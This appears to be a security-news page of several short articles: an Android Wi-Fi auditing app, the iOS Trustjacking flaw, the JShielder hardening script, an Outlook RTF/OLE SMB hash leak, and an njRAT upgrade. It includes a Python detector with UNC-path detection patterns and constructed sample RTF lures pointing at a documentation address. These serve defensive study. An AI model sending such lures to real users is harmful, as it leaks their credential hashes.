In Settings you will find an option to test the tools. If something fails, tap ‘Copy test command’ and select the tool that fails; this copies a test command to your clipboard, which you can run manually in a root shell to see what is wrong. If all the tests pass and you still have a problem, open an issue on the project page or use the “Send feedback” option in the application settings.

If the application crashes, a new activity starts that writes an error report to your external storage and offers to send it by email. The report is displayed in that activity, so you can see exactly what will be sent.

Keep in mind that Hijacker is just a GUI for these tools. The way it runs them is straightforward, and if all the tests pass and you are in monitor mode you should get the results you want. Also keep in mind that these are auditing tools, meant to test the security of your own network, so there is a possibility that the attacks will not work on your network. That is not the application's fault; it is something to be happy about.


TRUSTJACKING ATTACK ALLOWS HACKERS TO HACK IOS DEVICES

Symantec researchers have found a weakness that could allow attackers to compromise iOS devices without the owner's knowledge.

The attack, named “Trustjacking” by the researchers, abuses iTunes Wi-Fi Sync, a feature that lets an iOS device synchronise with iTunes without being physically connected. The feature is enabled by connecting the iOS device to a computer by cable, choosing on the device to trust that computer, and then enabling iTunes Wi-Fi Sync from the computer. Once that trust relationship exists, an attacker who controls the computer can secretly spy on the iOS device and record or control its activity remotely.


“With this the computer could access the photos on the device, make a backup, install applications and much more, without requiring another confirmation from the user and without any noticeable indication. It also allows activating the ‘iTunes Wi-Fi Sync’ function, which allows this type of communication with the device to continue even after it has been disconnected from the computer, provided that the computer and the iOS device are connected to the same network. It is important to mention that enabling ‘iTunes Wi-Fi Sync’ does not require the approval of the victim and can be carried out purely from the side of the computer,” wrote Roy Iarchy, head of research for Modern OS Security.

Adi Sharabani, senior vice president of Modern OS Security at Symantec, called it “extremely shocking.” Sharabani presented the findings at RSAC 2018 last Wednesday together with his colleague Iarchy.

The report states that once a malicious computer has been authorized, there is no way to prevent its continued access to the device. The researchers noted that users receive no message or notification when they authorize a computer telling them that they are granting access to the device even after the USB cable is disconnected.

“Even if the device is only connected for a very short time, it may be enough for an attacker to maintain visibility of all actions performed on the device after disconnecting it,” Iarchy wrote. The researchers reported the vulnerability to Apple, which addressed the problem by adding a further layer of protection in iOS 11: the user must now enter their password when choosing to trust a computer. However, the researchers believe that this measure is inadequate.

“The user is told that this authorization is only relevant while the device is connected to the computer, this makes the user believe that unplugging his device guarantees that nobody can access his private data,” Iarchy writes in a publication. “While we appreciate the mitigation that Apple has taken, we would like to emphasize that it does not address Trustjacking in a holistic way. Once the user has chosen to trust the compromised computer, the rest of the exploit continues to work.”

Information security analysts suggest that users enable encrypted backups in iTunes and choose a strong password to protect their devices. Users should also go to Settings > General > Reset > Reset Location & Privacy, which revokes trust for every previously connected computer, and then re-authorize the computers they still use.


JSHIELDER AUTOMATED HARDENING SCRIPT FOR LINUX SERVERS

JSHielder is an Open Source tool developed to help SysAdmin and developers secure their Linux Servers in which they will be deploying any web application or services. According to information security experts this tool automates the process of installing all the necessary packages to host a web application and Hardening a Linux server with little interaction from the user. Newly added script follows CIS Benchmark Guidance to establish a secure configuration posture for Linux systems.


This tool is a Bash script that hardens the Linux server automatically; the steps it follows are:

  • Configures a hostname
  • Reconfigures the timezone
  • Updates the entire system
  • Creates a new admin user so you can manage your server safely without remote connections as root
  • Helps the user generate secure RSA keys, so that remote access to the server is done exclusively from your local PC and not with a conventional password
  • Configures, optimizes and secures the SSH server (some settings following the CIS Benchmark for Ubuntu 16.04)
  • Configures iptables rules to protect the server from common attacks
  • Protects the server against brute force attacks by installing and configuring fail2ban
  • Stops port scans by blocking intrusive IPs via iptables using portsentry
  • Installs, configures and optimizes MySQL
  • Installs the Apache web server
  • Installs, configures and secures PHP
  • Secures Apache via its configuration file and by installing the modules ModSecurity, ModEvasive, Qos and SpamHaus
  • Installs Rootkit Hunter
  • Secures the root home and GRUB configuration files
  • Installs Unhide to help detect malicious hidden processes
  • Installs Tiger, a security auditing and intrusion prevention system
  • Restricts access to Apache config files
  • Disables compilers
  • Creates a daily cron job for system updates
  • Kernel hardening via a tweaked sysctl configuration file

Other hardening steps

  • Added PHP Suhosin installation to protect PHP code and core from known and unknown flaws (removed on Ubuntu 16.04)
  • Use of functions for code execution customization
  • Distro selection menu
  • Function selection menu
  • Deployment selection menu (LAMP, LEMP, reverse proxy)
  • Added LEMP deployment with ModSecurity
  • Added /tmp folder hardening
  • Added PSAD IDS installation
  • Added process accounting
  • Added unattended upgrades
  • Added MOTD and banners warning against unauthorized access
  • Disables USB support for improved security (optional)
  • Restrictive default UMASK
  • Added additional hardening steps
  • Auditd install
  • Sysstat install
  • ArpWatch install
  • Hardening steps following the CIS Benchmark
  • Secures cron
  • Disables unused filesystems and uncommon network protocols
  • Configures auditd rules following the CIS Benchmark (Ubuntu 16.04)
  • Automates the process of setting a GRUB bootloader password
  • Secures boot settings
  • Sets secure file permissions for critical system files

New function

Separate hardening script following CIS Benchmark guidance https://www.cisecurity.org/benchmark/ubuntu_linux/ (Ubuntu 16.04)
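The SSH hardening step and the CIS-following audit described above, as an added example in Python that is not JShielder's own code: the option list is an assumption made in the spirit of the CIS Ubuntu 16.04 benchmark's SSH section, `harden_sshd_config` rewrites or appends those options in the global section of an sshd_config (leaving Match blocks alone), and `audit_sshd_config` reports what deviates.

```python
"""Added example, not JShielder's own code: rewrite an sshd_config so that a set
of CIS-style options hold, and audit one. The option list is an assumption made
in the spirit of the CIS Ubuntu 16.04 benchmark's SSH section."""
import re

SSHD_SETTINGS = {                      # key -> required value in the global section
    'Protocol': '2', 'LogLevel': 'INFO', 'X11Forwarding': 'no', 'MaxAuthTries': '4',
    'IgnoreRhosts': 'yes', 'HostbasedAuthentication': 'no', 'PermitRootLogin': 'no',
    'PermitEmptyPasswords': 'no', 'PermitUserEnvironment': 'no',
    'ClientAliveInterval': '300', 'ClientAliveCountMax': '0', 'LoginGraceTime': '60',
    'PasswordAuthentication': 'no',
}

def _parse(line):
    """Return (key, value, is_commented) for an option-shaped line, else None."""
    m = re.match(r'^\s*(#?)\s*([A-Za-z][A-Za-z0-9]*)(?:\s+(.*?))?\s*$', line)
    return (m.group(2), m.group(3) or '', bool(m.group(1))) if m else None

def _match_index(lines):
    """Index of the first active 'Match' line; options after it are conditional."""
    for i, line in enumerate(lines):
        p = _parse(line)
        if p and not p[2] and p[0].lower() == 'match':
            return i
    return len(lines)

def harden_sshd_config(text: str) -> str:
    """Force each managed key (active or commented-out) to its required value in
    the global section, drop duplicates, append absent keys; Match blocks stay."""
    lines = text.splitlines()
    split, head, seen = _match_index(lines), [], set()
    for line in lines[:split]:
        p = _parse(line)
        if p and p[0] in SSHD_SETTINGS:
            if p[0] not in seen:           # first occurrence rewritten, rest dropped
                head.append(f'{p[0]} {SSHD_SETTINGS[p[0]]}')
                seen.add(p[0])
            continue
        head.append(line)
    head += [f'{k} {v}' for k, v in SSHD_SETTINGS.items() if k not in seen]
    return '\n'.join(head + lines[split:]) + '\n'

def audit_sshd_config(text: str) -> list:
    """List managed keys whose effective global value (sshd takes the first
    active one) is missing or wrong; an empty list means compliant."""
    effective, lines = {}, text.splitlines()
    for line in lines[:_match_index(lines)]:
        p = _parse(line)
        if p and not p[2]:
            effective.setdefault(p[0], p[1])
    return [f'{k}: expected {v!r}, got {effective.get(k)!r}'
            for k, v in SSHD_SETTINGS.items() if effective.get(k) != v]
```

Run `audit_sshd_config` on the result of `harden_sshd_config` to confirm the file is compliant before reloading sshd; running the hardener twice produces identical output.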

To run the tool, as the root user:

./jshielder.sh

If you have problems, please open a new issue for JShielder on GitHub.

Distro Availability

Ubuntu Server 14.04 LTS

Ubuntu Server 16.04 LTS

After the final release of Ubuntu 18.04 LTS, JShielder will no longer be maintained for Ubuntu 14.04, information security researchers said; the project will focus on the last two major LTS releases.


VULNERABILITY IN OUTLOOK LETS HACKERS STEAL PASSWORD HASHES

Most people rely on their Outlook email address for work-related as well as personal tasks. Unfortunately, Outlook may not be as secure as users would like to think. According to a report published by information security training experts at the Carnegie Mellon Software Engineering Institute, Outlook has a security bug that can leak password hashes when users preview Rich Text Format emails that contain remotely hosted OLE objects.


This security vulnerability exists because Microsoft does not apply strict content verification and restrictions when loading items from a remote SMB server. By contrast, the same flaw cannot be exploited through web-hosted content, because Microsoft applies much stricter restrictions to that type of content.

Outlook does not load web-hosted images in emails, in order to protect users’ IP addresses. However, when users preview RTF email messages that contain OLE objects loaded from a remote SMB server, Outlook does load the corresponding images.

This leads to a series of leaks that include the IP address, domain name, and more, as the report explains:

Outlook blocks remote web content due to the privacy risk of web bugs. But with a rich text email, the OLE object is loaded with no user interaction… Here we can see that an SMB connection is being automatically negotiated. The only action that triggers this negotiation is Outlook previewing an email that is sent to it… I can see that the following things are being leaked: IP address, domain name, user name, host name, SMB session key. A remote OLE object in a rich text email message functions like a web bug on steroids.


Microsoft has partially fixed the problem. Microsoft recently rolled out a fix on Patch Tuesday for this security issue. According to information security training experts, this solution is not 100% effective, as it fails to block all remote SMB attacks.

Once the fix is installed, previewed email messages will no longer automatically connect to remote SMB servers, which prevents the attack outlined above. It is important to realize that even with this patch, a user is still a single click away from falling victim to the same type of attack: for example, if an email message contains a UNC-style link beginning with “\\”, clicking the link initiates an SMB connection to the specified server.
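An added detection example, not code from the CERT/CC report or from Microsoft, for the mail-filter check a practitioner would want: it scans an RTF body for OLE object data and for UNC paths (including the post-patch one-click hyperlink case) that would make Outlook open an outbound SMB connection. The sample bodies and the 203.0.113.5 address are constructed.

```python
r"""Added example, not code from the CERT/CC report or from Microsoft: flag RTF
mail bodies carrying OLE objects or UNC (\\host\share) references, either of
which can make Outlook open an outbound SMB connection. The sample bodies are
constructed; 203.0.113.5 is an RFC 5737 documentation address."""
import re

UNC_RE = re.compile(r'\\\\[A-Za-z0-9._-]+\\[^\s"<>|{}]+')   # \\host\share[\...]
OBJECT_RE = re.compile(r'\\object\b')                       # OLE object group
OBJDATA_RE = re.compile(r'\\objdata\s*([0-9A-Fa-f\s]+)')    # its hex payload


def _objdata_views(hexblob: str) -> list:
    r"""Decode an \objdata payload as ANSI and as UTF-16LE; an OLE link
    moniker stores its target path in one of the two."""
    raw = bytes.fromhex(re.sub(r'\s+', '', hexblob))
    return [raw.decode('latin-1'), raw.decode('utf-16le', errors='ignore')]


def find_smb_lures(rtf: str) -> dict:
    """Report UNC paths visible in the body (hyperlinks included), UNC paths
    hidden inside OLE object data, and whether any OLE object is present."""
    # RTF writes a literal backslash as "\\"; undo that before matching text.
    text_paths = sorted(set(UNC_RE.findall(rtf.replace('\\\\', '\\'))))
    hidden = set()
    for blob in OBJDATA_RE.findall(rtf):
        for view in _objdata_views(blob):
            hidden.update(UNC_RE.findall(view))
    return {'has_ole_object': bool(OBJECT_RE.search(rtf)),
            'unc_in_text': text_paths, 'unc_in_objdata': sorted(hidden)}


# Constructed OLE link payload: an OLE1-style header followed by the UTF-16LE
# UNC target, as a linked \objdata blob would carry it.
_LINK_BLOB = (b'\x01\x05\x00\x00\x02\x00\x00\x00'
              + '\\\\203.0.113.5\\pub\\logo.ole'.encode('utf-16le'))
SAMPLE_RTF_OLE = (r'{\rtf1\ansi Quarterly report attached.\par '
                  r'{\object\objautlink\objw1000\objh1000{\*\objdata '
                  + _LINK_BLOB.hex() + '}}}')
# Constructed body with only a UNC-style hyperlink: the post-patch, one-click case.
SAMPLE_RTF_LINK = (r'{\rtf1\ansi See {\field{\*\fldinst HYPERLINK '
                   r'"\\\\203.0.113.5\\pub\\doc"}{\fldrslt the shared folder}}.}')
SAMPLE_RTF_CLEAN = r'{\rtf1\ansi Lunch at noon?\par}'

if __name__ == '__main__':
    for name, body in (('ole', SAMPLE_RTF_OLE), ('link', SAMPLE_RTF_LINK),
                       ('clean', SAMPLE_RTF_CLEAN)):
        print(name, find_smb_lures(body))
```

Any non-empty `unc_in_text` or `unc_in_objdata` is worth quarantining or alerting on, and blocking outbound SMB at the network edge removes the leak regardless of what the mail client does.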


NJRAT UPGRADED TO PUSH LIME RANSOMWARE AND A BITCOIN WALLET STEALER

njRAT, also known as Bladabindi, has been upgraded to push Lime ransomware and a Bitcoin wallet stealer. According to a Zscaler blog post, this trojan was first spotted in 2013 and has remained one of the most prevalent malware families.

The malware was developed with the Microsoft .NET Framework and uses multiple .NET obfuscation tools that make detection difficult for antivirus solutions and hinder analysis by information security training researchers.


The malware also uses dynamic DNS for its command-and-control (C2) servers and communicates over a custom TCP protocol on a configurable port, the blog said.

Deepen Desai, Zscaler’s senior director for information security training research and operations, said the source of the malware is unclear, but that researchers know the payload is being served from a compromised site hosted on a server in Australia.

Seventy percent of the affected users were in South America and the remaining 30 percent in North America. The new RAT variant adds ransomware and Bitcoin wallet-stealing features, which in practice work against each other.

“This is an interesting development, especially the ransomware feature, given that RATs by nature operate in stealth,” Desai said. “Ransomware on the other hand will reveal the infection.”

The information security training professional added that the author is taking a shortcut by stealing existing wallets, but said he would not be surprised if the author also added support for mining Bitcoin on the compromised system in a future variant.

The njRAT variant is also capable of performing ARME and Slowloris DDoS attacks.

The information security training experts described Slowloris as an attack tool designed to let a single machine take down a web server with minimal bandwidth: it sends many partial HTTP requests, opens as many connections to the target web server as it can, and holds them open for as long as possible.

“The malware also has a WORM functionality to spread through USB that enumerates the files and folders on the hard drive,” analysts said in the post. “Once it detects the USB drive inserted into the system, it copies itself to the USB drive and creates a shortcut using the folder icon.”

As the information security training professionals recommend, the best way to prevent infection is to follow standard security best practices when handling e-mails from external sources, since the malware is known to spread via malicious email links.
